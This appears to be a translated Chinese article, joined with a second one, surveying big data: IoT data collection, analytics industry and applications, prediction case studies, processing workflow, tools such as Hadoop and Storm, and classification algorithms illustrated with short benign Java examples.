Broader data collection will rest on the Internet of Things. As we wrote in "About to be surrounded by 28.1 billion sensors, and you still don't understand IoT technology?", by 2020 we are expected to be surrounded by 28.1 billion sensors; on the 27th of this month China Unicom also announced that its IoT connections already exceed 50 million. Foreseeably, from the consumer's point of view every aspect of daily life (clothing, food, housing, transport) will carry IoT devices collecting data in real time, and that data will let merchants offer better, even customized, services: a win-win. In industry, the big data collected by IoT will likewise play a large role, forming a virtuous circle.


Likewise, as data samples and collection channels multiply, services for the collection process, for data transformation and transport, and for data storage have developed considerably; Informatica and MuleSoft are representative companies in multi-channel data integration and data governance.

Part 3: Big data analysis and visualization

With sufficient storage and compute, and large volumes of data in hand, the development of the analysis industry followed naturally. The general-purpose data-analysis industry today spans six main business categories: data analysis, analysis visualization, big data search, and the derived data-service platforms, business-intelligence analysis, and big data prediction and consulting.

Data analysis itself will be covered in detail in the second and third articles; today we only sketch the overall picture and likely future directions.

For companies, the greatest value of big data analysis is integrating the large accumulations of user-behavior data, consumption data and data inside enterprise software, and using the analysis to improve product design, pricing and sales methods while cutting internal operating costs and raising efficiency. Pentaho, for example, pulls data of all kinds out of enterprise software (chiefly SAP) and mines and analyzes it, ultimately saving companies a great deal of report-building time and giving managers a real-time view of how the business is running.


Likewise, in specialized sectors such as telecoms, electricity and transport, collecting user data lets companies analyze and forecast future demand, adjust prices intelligently in real time ahead of it, and allocate load sensibly, maximizing profit while keeping operations safe.
Analyzing public-opinion data helps companies read market sentiment in time and iterate their products and services quickly; for financial firms it also surfaces the latest developments fast, avoiding the exposure to risk that comes from information asymmetry. Datameer's analysis engine, for instance, monitors public messages in real time, examining their language and how they spread, so users learn the news before the media report it, with visualization that makes it quick and easy to pick up.

Big data visualization, in turn, sits on top of analysis as the means by which people grasp analysis results more easily. Most visualization vendors treat it as an extension of their analysis business: Bottlenose, alongside its automated analysis, offers a "sonar" view of social-media analysis that makes complex relationships and threads of logic visible at a glance, increasing uptake of its analysis products.


As analysis techniques and methods keep advancing, visualization is expected to become a key direction; connecting increasingly complex analysis results with people will face continuing technical challenges.

Part 4: Industry applications of big data

Big data technology is now seen as infrastructure for future economic life, meaning almost every industry can gain economic efficiency on top of big data analysis. Xinghe Research Institute's study of big data applications this time covers more than 20 industries, including e-commerce, media and marketing, logistics, enterprise services, education, automotive, fintech and many more; those industries and companies will be introduced in articles four through seven.

In sales, given a customer's personality, dress habits, industry and historical sales data, big data analysis can tell a salesperson when calling which customer has the highest probability of yielding an order. In brand building, Persado writes copy that resonates with users based on analysis of market sentiment, earning consumer goodwill. In law, Ravel can "read" hundreds of thousands of past judgments and, for a case the user enters, predict the probability of each outcome, helping lawyers shape a defense strategy; in the long run, legal big data companies may well replace most junior lawyers. Likewise in retail, advertising, healthcare and many other fields, analyzing the relationships inside the data supports purchase prediction, precise audience targeting, assisted diagnosis and more. The industry applications of big data go far beyond those mentioned above; the coming articles will show their magic one by one.

Part 5: Big data becomes the fuel of the AI industry

Artificial intelligence has long been a goal of scientists and engineers, but its progress has not been smooth. In early natural-language recognition, scientists hoped grammar rules would let computers understand meaning and so achieve intelligence; practice proved that path unworkable, and only statistical methods built on large data samples effectively raised the accuracy of natural-language processing to a gradually usable level.

Today, as computing technology and data volumes grow, big data's benefits go well beyond information lookup. Besides the familiar "personal assistants" and live beauty filters, AI for language and vision offers writing modeled on brain structure, automatic meeting minutes, emotion recognition and personality analysis, even video content search, all with real power to push business and industry forward.

Acknowledgements: Wang Gang

Notes:

Hadoop: a distributed-system infrastructure developed by the Apache Foundation.

HDFS: the distributed file system in Hadoop. It runs on commodity hardware, is highly fault-tolerant, provides high-throughput data access, and suits applications with very large data sets.

MapReduce: a programming model for parallel computation over large data sets (greater than 1 TB). It greatly eases the task of running programs on distributed systems for programmers with no experience of distributed parallel programming.

MPP (Massively Parallel Processing): a system composed of many loosely coupled processing units; the CPUs in each unit have their own private resources, and each unit runs its own operating system and its own replica of the database-management instance.

SAP: the world's largest vendor of enterprise management and collaborative-commerce solutions and the world's third-largest independent software vendor, headquartered in Germany.

GFS: Google's scalable distributed file system for large, distributed applications that access large volumes of data. It runs on commodity hardware and provides fault tolerance.

Source: 36Kr




          Big data is all around you | real-life big data analysis cases and the technology behind them   


By Stephen Cui

I. Business applications of big data analysis

1. Predicting sports events

During the World Cup, Google, Baidu, Microsoft, Goldman Sachs and others all launched platforms to predict match results. Baidu's results were the most striking: across all 64 matches it was 67% accurate, rising to 94% in the knockout stage. Internet companies taking over from Paul the Octopus in match prediction suggests that future sports events will be dominated by big data prediction.

"In Baidu's World Cup predictions we considered five factors in total: team strength, home advantage, recent form, overall World Cup performance, and bookmakers' odds. The data came largely from the internet; we then used a machine-learning model designed by search experts to aggregate and analyze it and produce the predictions." (Zhang Tong, head of Baidu's Beijing Big Data Lab)



2. Predicting the stock market

Last year, research by Warwick Business School in the UK and the physics department of Boston University in the US found that the financial keywords users search on Google may anticipate the direction of financial markets; a corresponding investment strategy returned as much as 326%. Earlier, experts had tried to predict market swings from the sentiment of Twitter posts.

In theory, stock-market prediction suits the US better. China's stock market cannot profit in both directions (you gain only when shares rise), which attracts hot money that exploits information asymmetry to bend the market's behavior; without relatively stable regularities the Chinese market is hard to predict, and some variables that decisively affect outcomes simply cannot be monitored.

In the US, many hedge funds already invest with big data techniques, to considerable profit. In China, the CSI GF Baidu Baifa 100 index fund ("Baifa 100") has risen 68% in its first four-plus months online.

Like traditional quantitative investing, big data investing relies on models, but the number of data variables in the model grows geometrically: on top of the existing structured financial data it adds unstructured data such as social commentary, geographic information and satellite monitoring, and quantifies it so the model can absorb it.

Because big data models are extremely demanding on cost, practitioners expect big data to become a shared, platform-style service: data and technology are the ingredients and the pot, and fund managers and analysts can cook up their own strategies on the platform.

http://v.youku.com/v_show/id_XMzU0ODIxNjg0.html

3. Predicting market prices

CPI describes price movements that have already happened, and the statistics bureau's figures are not authoritative. Big data, though, may help people see where prices are heading, warning of inflation or economic crisis in advance. The classic case is Jack Ma learning of the Asian financial crisis early through Alibaba's B2B big data; the credit, of course, goes to Alibaba's data team.

4. Predicting user behavior

From users' search behavior, browsing behavior, review history and profile data, internet businesses can see consumers' overall demand and tailor production, improvement and marketing accordingly. House of Cards choosing cast and plot, Baidu targeting ads precisely by user preference, Alibaba booking production lines to customize products by Tmall user characteristics, Amazon predicting user clicks to ship ahead of orders: all have benefited from predicting internet user behavior.

Pre-purchase behavioral information can deeply reflect a potential customer's buying psychology and intent. For example, customer A views five TV sets in a row: four from domestic brand S, one from foreign brand T; four LED, one LCD; priced at 4,599, 5,199, 5,499, 5,999 and 7,999 yuan. To some degree this reflects A's brand affinity and leanings: toward domestic brands and mid-priced LED sets. Customer B views six sets in a row: two from foreign brand T, two from another foreign brand V, two from domestic brand S; four LED, two LCD; priced at 5,999, 7,999, 8,300, 9,200, 9,999 and 11,050 yuan. Similarly, this suggests B leans toward imported, high-priced LED sets.

http://36kr.com/p/205901.html

5. Predicting human health

Through observation, listening, questioning and pulse-taking, traditional Chinese medicine can spot some chronic diseases hidden in the body, even telling from a person's constitution what symptoms may appear in future. Vital signs change with certain regularities, and before a chronic disease appears the body already shows persistent anomalies. In theory, if big data captured such anomalies, chronic disease could be predicted.

6. Predicting disease epidemics

From people's searches and purchasing behavior, the likelihood of a large-scale epidemic outbreak can be predicted; the classic "flu prediction" is of this type. If more and more searches for "flu" and "banlangen" (a popular remedy) come from a region, a flu trend there can naturally be inferred.

Google successfully predicted winter flu:
In 2009, Google analyzed the 50 million search terms Americans used most frequently, compared them with US CDC data on seasonal flu transmission from 2003 to 2008, and built a dedicated mathematical model. Google successfully predicted the spread of flu in the winter of 2009, down to specific regions and states.

7. Predicting disasters

Weather forecasting is the most typical disaster prediction. If natural disasters such as earthquakes, floods, heat waves and rainstorms can be predicted and announced earlier with big data capabilities, it helps disaster reduction, preparedness, relief and recovery. Unlike in the past, when data collection had blind spots and high costs, the IoT era can use cheap sensors, cameras and wireless networks for real-time monitoring and collection, then apply big data prediction and analysis for more accurate natural-disaster forecasts.

8. Predicting environmental change

Beyond short-term, micro-level weather and disaster prediction, longer-term and macro-level prediction of environmental and ecological change is also possible. Shrinking forests and farmland, endangered wild animals and plants, rising coastlines, the greenhouse effect: these are the Earth's "chronic diseases". The more data humanity has about the Earth's ecosystems and weather patterns, the easier it is to model future environmental change and stop bad turns from happening. Big data helps humanity collect, store and mine more of the Earth's data, and supplies the tools for prediction.

9. Predicting traffic behavior

From LBS positioning data on users and vehicles, the individual and collective characteristics of travel can be analyzed to predict traffic behavior. Transport authorities can predict vehicle flows on different roads at different times for intelligent dispatch or tidal lanes; users can choose roads with a lower predicted chance of congestion.

Baidu's map-based LBS prediction covers a wider range: during Spring Festival travel it predicts migration trends to guide the scheduling of train lines and flights; on holidays it predicts visitor volumes at attractions to guide people's choices; and its everyday heat maps show crowding in city business districts, zoos and the like, guiding users' trips and merchants' site selection.

Dolgov's team uses machine-learning algorithms to build models of pedestrians on the road. Every mile a self-driving car travels is recorded; the car's computer keeps the data and analyzes how different objects behave in different environments. Some driver behaviors may be set as fixed variables (such as "green light, go"), but the computer does not apply such logic rigidly; it learns from actual driver behavior.

So a car following a garbage truck that stops may choose to change lanes and pass rather than stop behind it. Google has built up 700,000 miles of driving data, which helps its cars adjust their behavior from their own learned experience.



http://www.5lian.cn/html/2014/chelianwang_0522/42125_4.html

10. Predicting energy consumption

California's grid system operations center manages more than 80% of California's grid, delivering 289 million megawatts of electricity a year to 35 million users over more than 25,000 miles of power lines. The center uses Space-Time Insight's software for intelligent management, jointly analyzing massive data from sources including weather, sensors and metering devices to predict shifts in energy demand by locale, dispatch power intelligently, balance supply and demand across the grid, and respond quickly to potential crises. China's smart grid is already trialling similar big data prediction applications.

II. Kinds of big data analysis

By timeliness, data analysis divides into real-time analysis and offline analysis.

Real-time data analysis is typical of finance, mobile and internet B2C products, which often must return analysis over hundreds of millions of rows within seconds so as not to hurt the user experience. Meeting that demand takes carefully designed parallel clusters of traditional relational databases, or in-memory computing platforms, or HDD-based architectures, none of which come cheap in hardware or software. Newer tools for massive real-time analysis include EMC's Greenplum and SAP's HANA.

For most applications whose response requirements are not so strict, such as offline statistical analysis, machine learning, computing a search engine's inverted index, or computing recommendations, offline analysis is the way: collect log data into a dedicated analysis platform. Faced with massive data, however, traditional ETL tools often fail outright, mainly because the cost of data-format conversion is too high for their performance to keep up with collection. Internet companies' massive-data collectors, such as Facebook's open-source Scribe, LinkedIn's open-source Kafka, Taobao's open-source TimeTunnel, and Hadoop's Chukwa, can all sustain hundreds of MB per second of log collection and transfer, loading the data into a central Hadoop system.

By data volume, big data divides into three levels: memory-scale, BI-scale, and massive-scale.

Memory-scale means the data volume does not exceed the cluster's total memory. Do not underestimate today's memory: Facebook keeps as much as 320 TB of data cached in Memcached, and a current commodity PC server can hold more than 100 GB of memory. So in-memory databases can keep hot data resident in memory for very fast analysis, which is ideal for real-time workloads. Figure 1 shows a practical MongoDB-based analysis architecture.



Figure 1: a MongoDB architecture for real-time analysis

Large MongoDB clusters currently have some stability issues: periodic write stalls and primary/secondary sync failures. Even so, MongoDB remains a promising NoSQL option for high-speed data analysis.

Also, most vendors now offer solutions with 4 GB+ SSDs; memory plus SSD easily approaches in-memory analysis performance. As SSDs develop, in-memory data analysis is bound to spread more widely.

BI-scale means data too large for memory but generally manageable with traditional BI products and purpose-built BI databases for analysis. Mainstream BI products all offer solutions supporting terabyte-scale-plus data, in great variety.

Massive-scale means volumes at which databases and BI products fail entirely or cost too much. There are many excellent enterprise products at this level too, but given hardware and software costs, most internet companies store data on Hadoop's HDFS distributed file system and analyze it with MapReduce. Later, this article introduces a MapReduce-based multidimensional data-analysis platform on Hadoop.

III. The general workflow of big data analysis

3.1 Collection

Big data collection means using multiple databases to receive data from clients (web, app, sensors, etc.), where users can run simple queries and processing against them. E-commerce companies, for instance, use traditional relational databases such as MySQL and Oracle to store each transaction; NoSQL databases such as Redis and MongoDB are also commonly used for collection.

The main characteristic and challenge of collection is high concurrency, since thousands upon thousands of users may access and operate at the same time; train-ticket sites and Taobao peak at millions of concurrent accesses, so many databases must be deployed at the collection tier to carry the load, and load balancing and sharding among them genuinely require deep thought and design.

3.2 Import / preprocessing

Although the collection tier itself has many databases, effectively analyzing this mass of data requires importing the data from the front end into one centralized large distributed database or distributed storage cluster, with some simple cleaning and preprocessing on the way in. Some users also run streaming computation on import with Twitter's Storm to meet the real-time computing needs of parts of the business.
The characteristic and challenge of import and preprocessing is volume: imports often reach hundreds of megabytes, even gigabytes, per second.

3.3 Statistics / analysis

Statistics and analysis mainly use distributed databases, or distributed compute clusters, for ordinary analysis and aggregation of the massive data stored within them, satisfying most common analysis needs. Real-time requirements use EMC's Greenplum, Oracle's Exadata, or Infobright's MySQL-based columnar storage; batch workloads, or needs based on semi-structured data, can use Hadoop.
The main characteristic and challenge of statistics and analysis is the sheer volume of data involved, which heavily taxes system resources, I/O above all.

3.4 Mining

Unlike the statistics and analysis stage, data mining generally has no preset theme; it runs computations based on various algorithms over the existing data to achieve prediction, serving some higher-level analysis needs. Typical algorithms include k-means for clustering, SVM for statistical learning and Naive Bayes for classification, and the main tool used is Hadoop's Mahout. The characteristic and challenge of this stage is that mining algorithms are complex and the data and computation involved are both large; common mining algorithms are mostly single-threaded.


IV. Big data analysis tools

4.1 Hadoop

Hadoop is a software framework for distributed processing of large amounts of data, and it processes them in a reliable, efficient, scalable way. Hadoop is reliable because it assumes compute elements and storage will fail, so it maintains multiple working copies of the data and can redistribute processing around failed nodes. Hadoop is efficient because it works in parallel, speeding up processing. Hadoop is also scalable, handling petabyte-scale data. Moreover, Hadoop relies on community (commodity) servers, so its cost is low and anyone can use it.

Hadoop is a distributed computing platform that users can easily architect and use, letting them develop and run applications that process massive data. Its main advantages:

- High reliability: Hadoop's bit-by-bit storage and processing ability can be trusted.
- High scalability: Hadoop distributes data and computation across clusters of available machines that can easily grow to thousands of nodes.
- High efficiency: Hadoop moves data dynamically between nodes and keeps them dynamically balanced, so processing is very fast.
- High fault tolerance: Hadoop automatically keeps multiple copies of data and automatically reassigns failed tasks.

Hadoop comes with a framework written in the Java language, so it is ideal to run on Linux production platforms; applications on Hadoop can also be written in other languages, such as C++.
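The canonical first Hadoop program is a MapReduce word count; here is a condensed sketch against the standard Hadoop 2.x MapReduce API (input and output paths are passed on the command line):

import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.IntWritable;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.mapreduce.Job;
import org.apache.hadoop.mapreduce.Mapper;
import org.apache.hadoop.mapreduce.Reducer;
import org.apache.hadoop.mapreduce.lib.input.FileInputFormat;
import org.apache.hadoop.mapreduce.lib.output.FileOutputFormat;

public class WordCount {
    public static class TokenizerMapper extends Mapper<Object, Text, Text, IntWritable> {
        private final static IntWritable ONE = new IntWritable(1);
        private final Text word = new Text();
        public void map(Object key, Text value, Context ctx) throws IOException, InterruptedException {
            for (String tok : value.toString().split("\\s+")) { // emit (word, 1) per token
                if (!tok.isEmpty()) { word.set(tok); ctx.write(word, ONE); }
            }
        }
    }

    public static class IntSumReducer extends Reducer<Text, IntWritable, Text, IntWritable> {
        public void reduce(Text key, Iterable<IntWritable> vals, Context ctx)
                throws IOException, InterruptedException {
            int sum = 0;
            for (IntWritable v : vals) sum += v.get(); // sum the counts for each word
            ctx.write(key, new IntWritable(sum));
        }
    }

    public static void main(String[] args) throws Exception {
        Job job = Job.getInstance(new Configuration(), "word count");
        job.setJarByClass(WordCount.class);
        job.setMapperClass(TokenizerMapper.class);
        job.setCombinerClass(IntSumReducer.class);
        job.setReducerClass(IntSumReducer.class);
        job.setOutputKeyClass(Text.class);
        job.setOutputValueClass(IntWritable.class);
        FileInputFormat.addInputPath(job, new Path(args[0]));
        FileOutputFormat.setOutputPath(job, new Path(args[1]));
        System.exit(job.waitForCompletion(true) ? 0 : 1);
    }
}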

4.2 HPCC

HPCC stands for High Performance Computing and Communications. In 1993, the US Federal Coordinating Council for Science, Engineering and Technology submitted to Congress the report "Grand Challenges: High Performance Computing and Communications", the report known as the HPCC program, the US president's science strategy project, whose aim was to solve a set of important scientific and technological challenges by strengthening research and development. HPCC was the program the US implemented to build the information superhighway; its implementation was to cost tens of billions of dollars, with these main goals: develop scalable computing systems and related software to support terabit-class network transmission performance, develop gigabit network technology, and extend the connection capacity of research and educational institutions and networks.

The program has five main components:

- High-Performance Computing Systems (HPCS): research on coming generations of computer systems, system design tools, advanced prototype systems, and evaluation of existing systems;
- Advanced Software Technology and Algorithms (ASTA): software support for grand-challenge problems, new algorithm design, software branches and tools, computational research and high-performance computing research centers;
- National Research and Education Network (NREN): research and development of intermediate stations and gigabit-class transmission;
- Basic Research and Human Resources (BRHR): basic research, training, education and curricula, designed to increase the stream of innovation in scalable high-performance computing by rewarding investigator-initiated, long-term research, to enlarge the pool of skilled and trained personnel through better education and training in high-performance computing and communications, and to provide the infrastructure needed to support those investigations and research activities;
- Information Infrastructure Technology and Applications (IITA): intended to secure America's lead in developing advanced information technology.

4.3 Storm

Storm is free, open-source software: a distributed, fault-tolerant real-time computation system. Storm can very reliably process huge streams of data and is used to process Hadoop's batch data. Storm is simple, supports many programming languages, and is fun to use. Storm was open-sourced by Twitter; other well-known adopters include Groupon, Taobao, Alipay, Alibaba, Happy Elements and Admaster.

Storm has many application domains: real-time analytics, online machine learning, continuous computation, distributed RPC (a protocol for requesting services from remote computer programs over the network), ETL (Extraction-Transformation-Loading: data extraction, transformation and loading), and so on. Storm's processing speed is striking: in tests, each node processed one million data tuples per second. Storm is scalable and fault-tolerant, and easy to set up and operate.

4.4 Apache Drill

To help enterprise users find more effective ways to speed up Hadoop data queries, the Apache Software Foundation launched an open-source project named "Drill". Apache Drill implements Google's Dremel.

According to Tomer Shiran, product manager at Hadoop vendor MapR Technologies, Drill has been run as an Apache incubator project and will continue to be promoted to software engineers worldwide.

The project will create an open-source version of the Google Dremel Hadoop tool (which Google uses to speed up internet applications of its Hadoop data-analysis tooling). Drill will help Hadoop users query massive data sets faster.

The Drill project in fact also draws its inspiration from Google's Dremel project, which supports Google's analysis and processing of massive data sets, including analyzing crawled web documents, tracking application data installed on Android Market, analyzing spam, analyzing test results on Google's distributed build system, and more.

By developing the Drill Apache open-source project, organizations can hope to build out Drill's APIs and a flexible, powerful architecture that supports a broad range of data sources, data formats and query languages.

4.5 RapidMiner

RapidMiner is a world-leading data-mining solution with technology that is advanced to a very large degree. Its data-mining tasks cover a wide range, including diverse data arts, and it can simplify the design and evaluation of data-mining processes.

Functions and features:

- Free data-mining technology and libraries
- 100% Java code (runs across operating systems)
- Simple, powerful and intuitive data-mining processes
- Internal XML guarantees a standardized format for representing and exchanging data-mining processes
- Large-scale processes can be automated with a simple scripting language
- Multi-level data views ensure valid and transparent data
- Interactive prototyping in a graphical user interface
- Command line (batch mode) for automated large-scale application
- Java API (application programming interface)
- Simple plug-in and extension mechanisms
- A powerful visualization engine, with many cutting-edge visual models for high-dimensional data
- Support for more than 400 data-mining operators

Yale (the project's origin) has applied it successfully in many different domains, including text mining, multimedia mining, feature design, data-stream mining, integrated development of methods, and distributed data mining.

4.6 Pentaho BI

The Pentaho BI platform differs from traditional BI products: it is a process-centric, solution-oriented framework. Its purpose is to integrate a series of enterprise-grade BI products, open-source software, APIs and other components, making it easy to develop business-intelligence applications. Its appearance allowed a series of independent BI-oriented products such as Jfree and Quartz to be integrated into complex, complete business-intelligence solutions.

The Pentaho BI platform, the core architecture and foundation of the Pentaho Open BI suite, is process-centric because its central controller is a workflow engine. The workflow engine uses process definitions to define the business-intelligence processes executed on the BI platform. Processes can easily be customized, and new processes can be added. The BI platform includes components and reports for analyzing the performance of those processes. Pentaho currently comprises report generation, analysis, data mining, workflow management and so on. These components are integrated into the Pentaho platform through J2EE, WebService, SOAP, HTTP, Java, JavaScript, Portals and other technologies. Pentaho is distributed mainly in the form of the Pentaho SDK.

The Pentaho SDK has five parts: the Pentaho platform, the Pentaho sample database, a standalone Pentaho platform, Pentaho solution examples, and a preconfigured Pentaho web server. The Pentaho platform is the most important part, containing the main body of the platform's source code. The Pentaho database provides the data services the platform needs to run normally (configuration information, solution-related information, etc.); it is not strictly required for the platform and can be replaced by other database services through configuration. The standalone platform is an example of the platform's independent running mode, demonstrating how the platform runs without application-server support;

the Pentaho solution examples are an Eclipse project demonstrating how to develop business-intelligence solutions for the Pentaho platform.

The Pentaho BI platform is built on a foundation of servers, engines and components. These provide the system's J2EE server, security, portal, workflow, rules engine, charting, collaboration, content management, data integration, analysis and modeling capabilities. Most of these components are standards-based and can be replaced with other products.

4.7 SAS Enterprise Miner

- A complete toolset supporting the entire data-mining process
- An easy-to-use graphical interface that lets different kinds of users build models quickly
- Powerful model management and evaluation
- A fast, convenient model-release mechanism that helps close the business loop

V. Data-analysis algorithms

Big data analysis rests mainly on machine learning and large-scale computation. Machine learning includes supervised learning, unsupervised learning, reinforcement learning and more; supervised learning further includes classification, regression, ranking and matching (see Figure 1). Classification is the most common machine-learning problem: spam filtering, face detection, user profiling, text sentiment analysis and web-page categorization are all classification problems at heart. Classification is also the most thoroughly studied and most widely used branch of machine learning.

Recently, Fernández-Delgado et al. published an interesting paper in JMLR (Journal of Machine Learning Research, a top machine-learning journal). They pitted 179 different classification methods (classification algorithms) against each other on the 121 UCI data sets (UCI is a public machine-learning collection; none of the data sets is large). Random Forest and SVM came first and second, with little between them, and on 84.3% of the data Random Forest beat 90% of the other methods. In most cases, in other words, Random Forest or SVM alone gets the job done.


https://github.com/linyiqun/DataMiningAlgorithm

KNN

The k-nearest-neighbors algorithm. Given some training data and a new test point, find the training points nearest to the test point and assign the test point the class held by the majority of those neighbors. Optionally, neighbors can be given different weights: closer points get larger weights and farther points smaller ones. Details: see the repository linked above.
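
A minimal, self-contained sketch of the idea in Java (toy data, plain Euclidean distance, unweighted majority vote):

import java.util.*;

public class KnnToy {
    static class Point {
        final double x, y; final String label;
        Point(double x, double y, String label) { this.x = x; this.y = y; this.label = label; }
    }

    // Classify (x, y) by majority vote among the k nearest training points.
    static String classify(Point[] train, double x, double y, int k) {
        Point[] byDist = train.clone();
        Arrays.sort(byDist, Comparator.comparingDouble(p -> Math.hypot(p.x - x, p.y - y)));
        Map<String, Integer> votes = new HashMap<>();
        for (int i = 0; i < k; i++)
            votes.merge(byDist[i].label, 1, Integer::sum); // a distance-based weight could be used instead of 1
        return Collections.max(votes.entrySet(), Map.Entry.comparingByValue()).getKey();
    }

    public static void main(String[] args) {
        Point[] train = {
            new Point(1, 1, "A"), new Point(1, 2, "A"),
            new Point(5, 5, "B"), new Point(6, 5, "B"), new Point(5, 6, "B")
        };
        System.out.println(classify(train, 5.2, 5.1, 3)); // prints B
    }
}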

Naive Bayes

The naive Bayes algorithm. Naive Bayes is one of the simpler classifiers in the Bayesian family. It rests on the important Bayes theorem, which in one sentence amounts to converting between conditional probabilities. Details: see the repository linked above.

Naive Bayes classification is a very simple classification algorithm. It is called naive because its underlying idea really is plain: for a given item to be classified, compute the probability of each class given that the item appears, and assign the item to whichever class has the highest probability. Intuitively, it works like this: if you see a Black man on the street and someone asks you to guess where he is from, you will most likely guess Africa, because Africans make up the largest share of Black people; he might well be American or Asian, but with no other information available we choose the class with the highest conditional probability. That is the intuition behind naive Bayes.
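
The whole decision rule fits in a few lines. A toy sketch of a one-word spam filter, with made-up priors and likelihoods (all numbers are hypothetical):

// P(class | feature) is proportional to P(feature | class) * P(class);
// pick the class with the larger product.
public class NaiveBayesToy {
    public static void main(String[] args) {
        double pSpam = 0.3, pHam = 0.7;                   // class priors
        double pWordGivenSpam = 0.8, pWordGivenHam = 0.1; // likelihood of seeing the word
        double spamScore = pWordGivenSpam * pSpam;        // unnormalized posterior: 0.24
        double hamScore  = pWordGivenHam * pHam;          // unnormalized posterior: 0.07
        System.out.println(spamScore > hamScore ? "spam" : "ham"); // prints spam
    }
}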

SVM

The support vector machine algorithm. SVMs classify both linear and non-linear data; non-linear data can be handled by using a kernel function to transform the problem into a linear one. A key step is the search for the maximum-margin hyperplane. Details: see the repository linked above.
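
A sketch of the two pieces the paragraph mentions: classification with a (hypothetical, already-trained) linear decision function sign(w·x + b), and an RBF kernel of the kind used to handle non-linear data:

public class SvmDecision {
    static double dot(double[] a, double[] b) {
        double s = 0;
        for (int i = 0; i < a.length; i++) s += a[i] * b[i];
        return s;
    }
    // RBF kernel: replaces the dot product, implicitly mapping points
    // into a higher-dimensional space where they may be linearly separable.
    static double rbfKernel(double[] a, double[] b, double gamma) {
        double d2 = 0;
        for (int i = 0; i < a.length; i++) d2 += (a[i] - b[i]) * (a[i] - b[i]);
        return Math.exp(-gamma * d2);
    }
    public static void main(String[] args) {
        double[] w = {0.5, -1.0};  // hypothetical learned weights
        double b = 0.25;           // hypothetical learned bias
        double[] x = {2.0, 1.0};
        System.out.println(dot(w, x) + b > 0 ? "+1" : "-1");          // 0.25 > 0 -> +1
        System.out.println(rbfKernel(x, new double[]{2.0, 1.5}, 0.5)); // similarity in [0, 1]
    }
}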

Apriori

Apriori is an association-rule mining algorithm. It mines frequent itemsets through join and prune operations, then derives association rules from the frequent itemsets; the derived rules must satisfy a minimum confidence requirement. Details: see the repository linked above.
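
A toy sketch of the support-counting core of Apriori over a few hypothetical baskets (only pairs are counted here; full Apriori repeats this join-and-prune step for ever larger itemsets):

import java.util.*;

public class AprioriToy {
    public static void main(String[] args) {
        List<Set<String>> baskets = List.of(
            Set.of("beer", "diapers", "chips"),
            Set.of("beer", "diapers"),
            Set.of("diapers", "milk"),
            Set.of("beer", "chips"));
        int minSupport = 2;
        Map<Set<String>, Integer> pairCounts = new HashMap<>();
        for (Set<String> basket : baskets) {
            List<String> items = new ArrayList<>(basket);
            for (int i = 0; i < items.size(); i++)
                for (int j = i + 1; j < items.size(); j++)
                    pairCounts.merge(Set.of(items.get(i), items.get(j)), 1, Integer::sum);
        }
        // Prune: keep only the pairs that meet the minimum support.
        pairCounts.forEach((pair, count) -> {
            if (count >= minSupport) System.out.println(pair + " support=" + count);
        });
        // {beer, diapers} survives with support 2, the association behind the famous story.
    }
}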

PageRank

A page importance/ranking algorithm. PageRank originated at Google; its core idea is to use a page's inbound links as a measure of its quality. If a page contains several outbound links, its PR value is divided evenly among them. PageRank is also vulnerable to link-spam attacks. Details: see the repository linked above.
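
A minimal power-iteration sketch on a hypothetical three-page link graph; each page's PR is split evenly across its out-links, with the usual damping factor:

public class PageRankToy {
    public static void main(String[] args) {
        // links[i] = pages that page i links to (0 -> 1,2 ; 1 -> 2 ; 2 -> 0)
        int[][] links = { {1, 2}, {2}, {0} };
        int n = links.length;
        double d = 0.85; // damping factor
        double[] pr = new double[n];
        java.util.Arrays.fill(pr, 1.0 / n); // start from a uniform distribution
        for (int iter = 0; iter < 50; iter++) {
            double[] next = new double[n];
            java.util.Arrays.fill(next, (1 - d) / n);
            for (int i = 0; i < n; i++)
                for (int j : links[i])
                    next[j] += d * pr[i] / links[i].length; // PR is split evenly across out-links
            pr = next;
        }
        System.out.println(java.util.Arrays.toString(pr)); // pages 2 and 0 end up ranked highest
    }
}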

Random Forest

The random forest algorithm. The idea is decision trees plus bagging (bootstrap aggregation): each decision tree is a CART classification-and-regression tree, and the weak classifiers from the individual trees are combined into one final strong classifier. Each subtree is built from a random bootstrap sample of the data and a random subset of the attributes, which prevents overfitting. Details: see the repository linked above.
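
A sketch of the two ingredients described above, bootstrap sampling and majority voting; the "trees" here are hypothetical stubs standing in for real CART trees:

import java.util.*;

public class ForestToy {
    interface Classifier { String predict(double[] x); }

    // Draw a bootstrap sample: same size as the data, sampled with replacement.
    static <T> List<T> bootstrap(List<T> data, Random rnd) {
        List<T> sample = new ArrayList<>();
        for (int i = 0; i < data.size(); i++)
            sample.add(data.get(rnd.nextInt(data.size())));
        return sample;
    }

    // The forest's final answer is the majority vote of its trees.
    static String majorityVote(List<Classifier> forest, double[] x) {
        Map<String, Integer> votes = new HashMap<>();
        for (Classifier tree : forest)
            votes.merge(tree.predict(x), 1, Integer::sum);
        return Collections.max(votes.entrySet(), Map.Entry.comparingByValue()).getKey();
    }

    public static void main(String[] args) {
        // Three stub "trees", each thresholding different features:
        List<Classifier> forest = List.of(
            x -> x[0] > 0.5 ? "yes" : "no",
            x -> x[1] > 0.3 ? "yes" : "no",
            x -> x[0] + x[1] > 1.0 ? "yes" : "no");
        System.out.println(majorityVote(forest, new double[]{0.7, 0.2})); // prints no (2 votes to 1)
    }
}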

Artificial Neural Network

The term "neural network" actually comes from biology; what we refer to here should properly be called an "artificial neural network" (ANN).
Artificial neural networks have elementary self-adaptive and self-organizing abilities. They change their synaptic weights during learning or training to adapt to the demands of their environment, so the same network can take on different functions depending on how and on what it is trained. An ANN is a system capable of learning; it can develop knowledge to the point of exceeding the designer's original level. Its training generally falls into two modes. One is supervised ("with a teacher") learning, which uses given labeled samples for classification or imitation. The other is unsupervised ("without a teacher") learning, in which only the learning mode or certain rules are specified, and what is actually learned depends on the system's environment (i.e., its input signals); the system can discover the environment's features and regularities on its own, a capability closer to that of the human brain.

6. Case Studies

6.1 Beer and Diapers


The "beer and diapers" story comes from Walmart supermarkets in the United States in the 1990s. While analyzing sales data, Walmart managers noticed a puzzling phenomenon: under certain conditions, "beer" and "diapers", two seemingly unrelated products, frequently appeared in the same shopping basket. The unusual sales pattern caught managers' attention, and follow-up investigation found that it occurred among young fathers.

